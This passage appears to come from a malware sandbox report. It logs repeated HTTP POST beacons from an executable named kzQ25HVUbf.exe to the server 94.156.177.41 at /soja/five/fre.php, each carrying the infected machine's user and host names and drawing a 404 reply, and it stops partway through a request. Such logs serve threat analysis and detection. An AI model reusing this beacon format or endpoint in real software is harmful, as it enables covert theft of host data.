                              15192.168.2.94991194.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:31.238603115 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:31.243472099 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:31.960581064 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:31 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              16192.168.2.94991794.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:32.127331018 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:32.132348061 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:32.876811028 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:32 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              17192.168.2.94992394.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:33.030534029 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:33.035370111 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:33.740371943 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:33 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              18192.168.2.94992994.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:33.896517992 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:33.901352882 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:34.614382029 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:34 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              19192.168.2.94993894.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:34.775362968 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:34.780299902 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:35.492938995 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:35 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              20192.168.2.94994694.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:35.651675940 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:35.656564951 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:36.377417088 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:36 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              21192.168.2.94995294.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:36.537604094 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:36.542433977 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:37.256186962 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:37 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              22192.168.2.94995894.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:37.409082890 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:37.413980961 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:38.126209974 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:38 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              23192.168.2.94996494.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:38.273817062 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:38.278631926 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:39.132728100 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:39 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              24192.168.2.94997294.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:39.293143034 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:39.298254967 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:39.989154100 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:39 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              25192.168.2.94998094.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:40.155107021 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:40.160259008 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:40.867495060 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:40 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              26192.168.2.94998794.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:41.021596909 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:41.027625084 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:41.715739012 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:41 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              27192.168.2.94999394.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:41.872127056 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:41.877046108 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:42.601721048 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:42 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              28192.168.2.94999994.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:42.761287928 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:42.766185999 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:43.489492893 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:43 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              29192.168.2.95000694.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:43.642792940 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:43.647766113 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:44.355365992 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:44 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              30192.168.2.95000994.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:44.504832029 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:44.509809017 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:45.204397917 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:45 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              31192.168.2.95001094.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:45.346792936 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:45.351886034 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:46.086905956 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:45 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              32192.168.2.95001194.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:46.243031979 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:46.247937918 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:46.977591038 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:46 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              33192.168.2.95001294.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:47.136224031 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:47.141185999 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:47.837078094 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:47 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              34192.168.2.95001394.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:47.988188982 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:47.993043900 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:48.698934078 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:48 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              35192.168.2.95001494.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:48.846707106 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: F4FE624
                              Content-Length: 145
                              Connection: close
                              Jan 11, 2025 08:37:48.851758003 CET145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 37 00 34 00 35 00 34 00 38 00 31 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                              Data Ascii: (ckav.rutina745481TINA-PC0FDD42EE188E931437F4FBE2C
                              Jan 11, 2025 08:37:49.557455063 CET186INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.1
                              Date: Sat, 11 Jan 2025 07:37:49 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              X-Powered-By: PHP/5.4.16
                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                              Data Ascii: File not found.


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              36192.168.2.95001594.156.177.41808076C:\Users\user\Desktop\kzQ25HVUbf.exe
                              TimestampBytes transferredDirectionData
                              Jan 11, 2025 08:37:49.705311060 CET242OUTPOST /soja/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: 94.156.177.41
                              Accept: */*
                              Content-Type: application/octet-stream
